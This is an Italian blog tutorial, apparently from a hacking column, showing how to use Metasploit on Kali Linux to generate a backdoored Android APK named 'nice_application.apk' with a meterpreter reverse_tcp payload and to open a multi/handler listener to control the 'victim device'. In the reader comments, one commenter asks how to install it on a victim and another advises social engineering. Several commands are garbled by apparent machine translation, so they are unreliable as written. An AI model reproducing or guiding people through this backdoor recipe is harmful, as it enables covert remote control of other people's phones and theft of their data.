Buon giorno a tutti ragazzi!
A gran richiesta ritorna la rubrica Ge Hacked e, per ripartire in bellezza, oggi vi mostriamo uno tra i più utili e potenti tools di Kali Linux: Metasploit.
Più nello specifico vi mostreremo come creare, tramite questo strumento, una backdoor da inserire su uno smartphone Android (povero robottino verde!).
Operazioni di questo genere possono risultare davvero complesse per i “non smanettoni” ma, grazie a questa guida, riusciremo ad ottenere un buon risultato in pochissimi passaggi.

Pronti? Bene iniziamo!

1Installazione Kali Linux

Per prima cosa dovrete avere Kali Linux installato sul vostro computer o tramite macchina virtuale. Per il download vi basterà andare sul sito ufficiale e scaricare la versione compatibile con l’architettura del vostro PC (32, 64bit)

Download

2Aggiornamento Metasploit

Ora che abbiamo installato con successo Kali Linux, dovremo aggiornare alcuni componenti di sistema.

Per fare ciò, andiamo sul terminale e digitiamo il seguente comando

sudo msfupdate


Vi richiederà la password da utente root, la inserite e partirà la procedura per aggiornare Metasploit. Ora avrai tutti i più recenti exploit di Metasploit tra cui Android / meterpreter / reverse_tcp e Android / shell / reverse_tcp.

3Creiamo l’apk con la backdoor.

Ora diamo il seguente comando al terminale

sudo msfpayload android / meterpreter / reverse_tcp Lhost = XXXX LPORT = 4444 R> nice_application.apk


Ciò creerà sul pc un file .apk contenente la backdoor che dovrà successivamente essere installata sul dispositivo vittima.

Nel comando la chiave XXXX LPORT è quella che il dispositivo Android rimanderà a reverse_tcp. Possiamo utilizzare qualsiasi porta, a patto che il numero sia maggiore di 1023 (le porte fino a 1023 sono ben conosciute).

4Configurazione del tcp

 

Adesso apriamo una nuova finestra di Metasploit che avrà lo stesso numero di porta inserito precedentemente. Questo servirà a gestire il tcp.
Ora su questa stessa console digitate questi comandi:

sudo msfconsole
uso sfruttatore / Multi / handler
set payload android / meterpreter / reverse_tcp
set Lhost XXXX
set lport 4444
exploit


Si aprirà multi-pannello che servirà a ricevere i dati dal dispositivo vittima.

Anche per oggi è tutto, continuate a seguirci su gexperience.it per altre interessanti guide.

Buon hacking e……. ah si, Stay-Pure!

  • eros

    Come faccio a installarla sul dispositivo della “vittima”?

    • Ovviamente la guida non ha come scopo quello di permettere alle persone di violare i dispositivi altrui. Nel caso in cui tu voglia fare un test sul tuo smartphone, non credo avrai difficoltà ad installare l’apk.

    • Meetinfa

      ingegneria sociale zio, se vuoi diventare un hacker studia prima quella e poi il resto.

  • Luca Gnocchi

    Ciao, sto provando sul MIO dispositivo personale ma quando devo immettere il mio indirizzo Ip, se nel terminale eseguo il comando ifconfig, non mi dà la voce inet addr xxx.x.xxx.x, solo inet xx.x.x.xx, ho provato a mettere quell’ip ma al momento di collegarsi alla porta esterna ricevo errore to bind xx.x.xx.xxx:(4444) ho provato anche altre porte. Grazie mille in anticipo e grazie della guida.